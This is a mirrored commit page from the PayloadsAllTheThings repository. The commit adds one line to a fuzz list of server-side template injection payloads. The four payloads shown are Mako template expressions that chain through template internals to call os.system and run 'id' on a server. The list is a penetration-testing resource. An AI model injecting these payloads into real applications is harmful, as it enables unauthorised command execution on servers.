mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
Update ssti.fuzz
This commit is contained in:
parent
dd875ffa32
commit
b84e4c3a7d
1 changed files with 1 additions and 0 deletions
|
@ -52,3 +52,4 @@ ${self.template.module.cache.util.os.system("id")}
|
|||
${self.module.cache.compat.inspect.os.system("id")}
|
||||
${self.__init__.__globals__['util'].os.system('id')}
|
||||
${self.template.module.runtime.util.os.system("id")}
|
||||
${self.module.filters.compat.inspect.os.system("id")}
|
||||
|
|
Loading…
Reference in a new issue